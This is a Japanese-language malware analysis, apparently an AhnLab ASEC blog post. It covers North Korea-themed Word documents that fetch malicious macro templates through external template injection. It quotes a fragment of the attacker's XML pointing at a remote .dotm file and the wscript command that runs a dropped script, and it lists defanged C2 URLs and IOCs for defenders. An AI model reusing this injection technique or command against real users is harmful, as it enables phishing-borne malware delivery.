対北朝鮮に関する本文内容の External リンクを利用した不正な Word ドキュメント

AhnLab ASEC 分析チームでは、様々な形式のドキュメント型マルウェアについて紹介してきた。その中で、対北朝鮮に関する本文内容の不正なドキュメントは主に HWP (アレアハングル)形式で製作されており、過去の ASEC ブログでもその内容を確認できる。今回紹介する内容は、対北朝鮮に関する本文内容が記載された不正な DOC(Word)ドキュメントであり、ASEC 分析チームがこれまでに確保した当該ドキュメントの一部を公開する。

電子メールによって配布されたものと推定される当該ドキュメントは、以下のような本文内容を含んでおり、ドキュメント内部の XML に記述されたコードに「外部 External 接続アドレス」で接続して追加でドキュメントファイルをダウンロードする。XML 内部で以下の例のように External で定義された外部 URL に接続される。最近拡散している対北朝鮮関連文書においては、このような攻撃手法が共通して使用されているため、注意が必要とされている。

External 攻撃の例(XML コードの一部)
Target=”hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6″ TargetMode=”External“/>

[文書1] ファイル名:질의서.docx (翻訳:質疑書.docx)

● External 接続アドレス:hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6

[文書2] ファイル名:업무보고.docx (翻訳:業務報告.docx)
● External 接続アドレス:hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6

[文書3] ファイル名:북한 8차 당대회 평가와 바이든 .docx (翻訳:北朝鮮8次党大会評価とバイデン.docx)

● External 接続アドレス:hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6

[文書4] ファイル名:당대회 결론.docx (翻訳:党大会結論.docx)

● External 接続アドレス:hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119

[文書5] ファイル名:2021-0112 종합 당대회평가.docx (翻訳:2021-0112総合党大会評価.docx)
● External 接続アドレス:hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119

[文書1、2、3] Word ドキュメントには保護機能がかけられており、すぐに文書内容を確認することができない。ASEC 分析チームでは、この保護機能を解除して内部の文書内容を確認した。以下の構造で動作するものと見られる当該ドキュメントのうち、VBA Macro Word ファイルが確保された[文書1、2]について説明する。

[図1] – 動作構造

[図2] – [文書1]の保護機能解除前の文書内容

[文書1]は単独で開いた場合、上記のように文書が保護されている形式となっており、北朝鮮関連の質問内容を本文内容に含んでいる。内部には、追加で不正なマクロ Word ドキュメントを External を通してダウンロード接続するために、以下のような XML ファイルを含んでいる。

[図3] – External 接続 XML

target で接続を試みる「hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6」から受け取ったドキュメントファイルも Word ドキュメント形式であり、不正なマクロを含んでいる。マクロコードは以下のように難読化されており、実行するとデフォルトの office ユーザーテンプレートが位置する template フォルダに不正な xml を生成してから実行する。以下、難読化されたマクロをデバッグする中間コードをキャプチャした図のように、生成する xml のパスとその内容を確認できる。

[図4] – マクロをデバッグする中間コード
  • コマンド:wscript.exe //e:vbscript //b C:\Users\[ユーザー名]\AppData\Roaming\Microsoft\Templates\1589989024.xml
[図5] -1589989024.xml の内容

上記の図で確認できるように、生成された xml ファイルは追加で不正なネットワークアドレスにアクセスを試みる。

[文書2]のファイルも中間段階の不正なマクロ Word ファイルが確認されたが、動作構造と難読化されたマクロの形式が酷似していることから見て、同じ攻撃者グループによって製作されたものと見られる。二つのドキュメントの C2 を整理すると以下のようになり、最終的に追加のマルウェアをダウンロードして実行したものと推定される。

[文書1] ファイル名:질의서.docx (翻訳:質疑書.docx)

○ XML External 接続後、追加の DOC ファイルをダウンロードするアドレス: hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6

○ 上記の文書で生成された XML が追加で接続するアドレス:
hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1
[文書2] ファイル名:업무보고.docx (翻訳:業務報告.docx)

○ XML External 接続後、追加の DOC ファイルをダウンロードするアドレス:
hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6

○ 上記の文書で生成された XML が追加で接続するアドレス:
hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1

上記の通り、これらの文書は電子メールによって北朝鮮関連の業務を遂行する受信者に送信された可能性が非常に高い。スパムメールによる社会工学的手法の攻撃が多数増加したこともあり、ユーザーはこのような攻撃によって被害が生じないよう、注意を払わなければならない。

当社では、上記のようなファイルを以下の通り診断している。

[ファイル診断]
Downloader/DOC.External
Downloader/XML.Generic
Downloader/DOC.Generic
Downloader/DOC.Agent

[IOC 情報]
hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1
hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6
hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1
hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6

5 3 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments